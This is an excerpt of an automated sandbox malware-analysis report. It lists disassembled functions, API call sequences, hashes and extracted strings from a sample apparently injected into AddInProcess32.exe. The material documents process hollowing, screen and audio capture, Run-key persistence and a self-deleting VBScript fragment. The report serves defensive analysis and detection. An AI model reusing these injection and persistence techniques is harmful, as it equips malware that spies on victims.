                                                                                                        • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                        • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                        • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                        • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 1663032902-0
                                                                                                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                        • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                        • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2692324296-0
                                                                                                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                        • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                        • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                        APIs
                                                                                                          • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                        • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                        • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                        • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                        • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084509184-0
                                                                                                        • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                        • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                        • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                        • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                        • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                        • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                          • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                        • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                        • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                        • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                        • DeleteObject.GDI32(?), ref: 00418107
                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                        • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                        • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                        • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                        • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                        • DeleteDC.GDI32(?), ref: 00418398
                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                        • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                        • String ID: DISPLAY
                                                                                                        • API String ID: 1765752176-865373369
                                                                                                        • Opcode ID: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                                        • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                        • Opcode Fuzzy Hash: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                                        • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 4188446516-3035715614
• Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
• Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
• Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
• Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
• ExitProcess.KERNEL32 ref: 0041151D
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
• GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
• Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
• OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
• String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
• API String ID: 4250697656-2665858469
• Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
• Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
• Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
• Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-3168347843
• Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
• Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
• Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
• Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
• ExitProcess.KERNEL32 ref: 0040C287
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-1998216422
• Opcode ID: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
• Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
• Opcode Fuzzy Hash: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
• Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
• SetEvent.KERNEL32 ref: 0041A38A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
• CloseHandle.KERNEL32 ref: 0041A3AB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
• API String ID: 738084811-1408154895
• Opcode ID: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
• Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
• Opcode Fuzzy Hash: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
• Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
• WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
• WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
• WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
• Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
• GetProcAddress.KERNEL32(00000000), ref: 004064FD
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
